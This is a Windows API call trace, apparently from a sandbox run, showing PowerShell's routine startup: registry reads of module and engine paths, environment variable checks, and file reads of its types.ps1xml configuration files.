	[0270.167] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d728 | out: phkResult=0x12d728*=0x324) returned 0x0
	[0270.167] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d6ac, lpData=0x0, lpcbData=0x12d6a8*=0x0 | out: lpType=0x12d6ac*=0x2, lpData=0x0, lpcbData=0x12d6a8*=0x6c) returned 0x0
	[0270.167] CoTaskMemAlloc (cb=0x70) returned 0x204eb0
	[0270.167] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d67c, lpData=0x204eb0, lpcbData=0x12d678*=0x6c | out: lpType=0x12d67c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x12d678*=0x6c) returned 0x0
	[0270.167] CoTaskMemFree (pv=0x204eb0) 
	[0270.167] CoTaskMemAlloc (cb=0xcc) returned 0x1b89da50
	[0270.167] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b89da50, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0270.167] CoTaskMemFree (pv=0x1b89da50) 
	[0270.168] CoTaskMemAlloc (cb=0xcc) returned 0x1b89da50
	[0270.168] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b89da50, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0270.168] CoTaskMemFree (pv=0x1b89da50) 
	[0270.171] RegCloseKey (hKey=0x324) returned 0x0
	[0270.171] CoTaskMemAlloc (cb=0xcc) returned 0x1b89da50
	[0270.171] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b89da50, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0270.171] CoTaskMemFree (pv=0x1b89da50) 
	[0270.171] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d728 | out: phkResult=0x12d728*=0x324) returned 0x0
	[0270.171] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d6ac, lpData=0x0, lpcbData=0x12d6a8*=0x0 | out: lpType=0x12d6ac*=0x0, lpData=0x0, lpcbData=0x12d6a8*=0x0) returned 0x2
	[0270.172] RegCloseKey (hKey=0x324) returned 0x0
	[0270.175] CoTaskMemAlloc (cb=0x20c) returned 0x257130
	[0270.176] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x257130 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0270.177] CoTaskMemFree (pv=0x257130) 
	[0270.177] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0270.178] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0270.188] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0270.188] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0270.188] CoTaskMemFree (pv=0x24c3e0) 
	[0270.189] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0270.189] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0270.189] CoTaskMemFree (pv=0x24c3e0) 
	[0270.191] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0270.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0270.191] CoTaskMemFree (pv=0x24c3e0) 
	[0270.191] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0270.191] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0270.191] CoTaskMemFree (pv=0x24c3e0) 
	[0270.193] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d518 | out: phkResult=0x12d518*=0x32c) returned 0x0
	[0270.194] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x12d52c, lpData=0x0, lpcbData=0x12d528*=0x0 | out: lpType=0x12d52c*=0x1, lpData=0x0, lpcbData=0x12d528*=0x74) returned 0x0
	[0270.195] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x12d49c, lpData=0x0, lpcbData=0x12d498*=0x0 | out: lpType=0x12d49c*=0x1, lpData=0x0, lpcbData=0x12d498*=0x74) returned 0x0
	[0270.195] CoTaskMemAlloc (cb=0x78) returned 0x204eb0
	[0270.195] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x12d46c, lpData=0x204eb0, lpcbData=0x12d468*=0x74 | out: lpType=0x12d46c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d468*=0x74) returned 0x0
	[0270.195] CoTaskMemFree (pv=0x204eb0) 
	[0270.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0270.195] SetErrorMode (uMode=0x1) returned 0x1
	[0270.195] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d3f0 | out: lpFileInformation=0x12d3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0270.195] SetErrorMode (uMode=0x1) returned 0x1
	[0270.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0270.196] SetErrorMode (uMode=0x1) returned 0x1
	[0270.196] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d3f0 | out: lpFileInformation=0x12d3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0270.196] SetErrorMode (uMode=0x1) returned 0x1
	[0270.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0270.199] SetErrorMode (uMode=0x1) returned 0x1
	[0270.199] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d3f0 | out: lpFileInformation=0x12d3f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0270.199] SetErrorMode (uMode=0x1) returned 0x1
	[0270.199] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0270.199] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0270.199] CoTaskMemFree (pv=0x24c3e0) 
	[0270.202] CoTaskMemAlloc (cb=0x104) returned 0x24c3e0
	[0270.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c3e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0270.202] CoTaskMemFree (pv=0x24c3e0) 
	[0270.202] GetACP () returned 0x4e4
	[0270.209] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0270.209] SetErrorMode (uMode=0x1) returned 0x1
	[0270.210] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0270.210] GetFileType (hFile=0x330) returned 0x1
	[0270.210] SetErrorMode (uMode=0x1) returned 0x1
	[0270.210] GetFileType (hFile=0x330) returned 0x1
	[0270.914] ReadFile (in: hFile=0x330, lpBuffer=0x2de8a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2de8a08*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0270.915] ReadFile (in: hFile=0x330, lpBuffer=0x2de8a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2de8a08*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0270.915] ReadFile (in: hFile=0x330, lpBuffer=0x2de8a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2de8a08*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0270.915] ReadFile (in: hFile=0x330, lpBuffer=0x2de8a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2de8a08*, lpNumberOfBytesRead=0x12d328*=0xcf3, lpOverlapped=0x0) returned 1
	[0270.916] ReadFile (in: hFile=0x330, lpBuffer=0x2de7e63, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2de7e63*, lpNumberOfBytesRead=0x12d328*=0x0, lpOverlapped=0x0) returned 1
	[0270.916] ReadFile (in: hFile=0x330, lpBuffer=0x2de8a08, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2de8a08*, lpNumberOfBytesRead=0x12d328*=0x0, lpOverlapped=0x0) returned 1
	[0270.919] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0270.919] SetErrorMode (uMode=0x1) returned 0x1
	[0270.919] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d2a0 | out: lpFileInformation=0x12d2a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0270.919] SetErrorMode (uMode=0x1) returned 0x1
	[0270.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0270.920] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d388 | out: phkResult=0x12d388*=0x330) returned 0x0
	[0270.920] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d30c, lpData=0x0, lpcbData=0x12d308*=0x0 | out: lpType=0x12d30c*=0x1, lpData=0x0, lpcbData=0x12d308*=0x56) returned 0x0
	[0270.920] CoTaskMemAlloc (cb=0x5a) returned 0x271eb0
	[0270.920] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d2dc, lpData=0x271eb0, lpcbData=0x12d2d8*=0x56 | out: lpType=0x12d2dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d2d8*=0x56) returned 0x0
	[0270.920] CoTaskMemFree (pv=0x271eb0) 
	[0270.920] RegCloseKey (hKey=0x330) returned 0x0
	[0270.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0270.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12ce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0271.556] GetSystemInfo (in: lpSystemInfo=0x12bfc0 | out: lpSystemInfo=0x12bfc0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0271.556] VirtualQuery (in: lpAddress=0x12c070, lpBuffer=0x12cf30, dwLength=0x30 | out: lpBuffer=0x12cf30*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0271.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12cda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0271.571] SetErrorMode (uMode=0x1) returned 0x1
	[0271.571] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0271.571] GetFileType (hFile=0x1c4) returned 0x1
	[0271.571] SetErrorMode (uMode=0x1) returned 0x1
	[0271.571] GetFileType (hFile=0x1c4) returned 0x1
	[0271.571] ReadFile (in: hFile=0x1c4, lpBuffer=0x2e4fbc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2e4fbc8*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.581] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.581] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.581] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.582] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.582] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.582] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.582] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.583] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.584] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.584] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.584] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.584] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.585] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.585] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.585] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.585] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.587] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.587] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.588] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.588] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.588] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.588] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.589] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.589] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.589] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.590] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.590] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.590] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.591] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.591] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.591] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.591] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.594] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.594] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.595] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.595] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.595] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
	[0271.595] ReadFile (in: hFile=0x1c4, lpBuffer=0x2cb5780, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d328, lpOverlapped=0x0 | out: lpBuffer=0x2cb5780*, lpNumberOfBytesRead=0x12d328*=0x1000, lpOverlapped=0x0) returned 1
